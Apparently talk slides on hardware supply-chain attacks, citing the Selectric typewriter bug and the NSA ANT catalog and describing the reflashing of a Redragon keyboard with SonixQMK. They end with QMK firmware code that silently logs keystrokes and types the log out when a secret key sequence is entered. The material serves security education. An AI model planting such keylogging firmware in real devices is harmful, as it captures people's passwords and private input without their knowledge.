A supply chain is a system of organizations, people, activities, information and resources involved in moving a product or service from supplier to customer.
Itβs all the steps that need to happen for a product to get from where it is produced to where itβs sold
BSides Cape Town 2018 - Lightning Talk
Bloomberg Business - The Big Hack
The USSR built a bug that they installed into a bunch of IBM Selectric II typewriters for use by the US Embassy.
CryptoMuseum: Selectric bug
The NSA ANT catalog is a 50-page classified document listing technology available to the United States National Security Agency (NSA) Tailored Access Operations (TAO) by the Advanced Network Technology (ANT) Division to aid in cyber surveillance.
NSA TAO (Tailored Access Operations) Unit intercepted and "upgraded" hardware shipped to organizations targeted for surveillance. - Ars Technica
Nice Keyboard, brain-dead key mapping.
Nice Keyboard and supposedly supported by SonixQMK
Redragon_K589RGB-8409_V0100-VS11K28A-CN_EN-20220825.zip
Bootloader mode
bootloader
Microdia CH555
EVision RGB Keyboard
Reboot to Bootloader [eVision]
jumploader-generic.bin
sonix-keyboard-bootloader
SN32F260
static uint16_t keylog[MAX_KEYLOG_BUFFER_LENGTH]; static int keylogPos = 0; bool process_record_kb(uint16_t keycode, keyrecord_t *record) { if (record->event.pressed) {log_key(keycode, record);} return process_record_user(keycode, record); } void log_key(uint16_t keycode, keyrecord_t *record) { keylog[keylogPos] = keycode; keylogPos++; if (keylogPos >= MAX_KEYLOG_BUFFER_LENGTH) {keylogPos = 0;} }
//uint16_t dumpKey[] = {KC_H,KC_U,KC_N,KC_T,KC_E,KC_R,KC_3}; uint16_t dumpKey[] = {KC_UP,KC_UP,KC_DOWN,KC_DOWN,KC_LEFT,KC_RIGHT,KC_LEFT,KC_RIGHT,KC_A,KC_B}; static int dumpKeyPos = 0; bool process_record_user(uint16_t keycode, keyrecord_t *record) { if (record->event.pressed) { if (keycode == dumpKey[dumpKeyPos]) { dumpKeyPos++; if (dumpKeyPos > (sizeof(dumpKey) /sizeof(dumpKey[0])) -1 ) { SEND_STRING("\nAll Your String Belong To Us\n"); dump_keylog(); SEND_STRING("\n--------\n"); } } else {dumpKeyPos =0;} } return true; }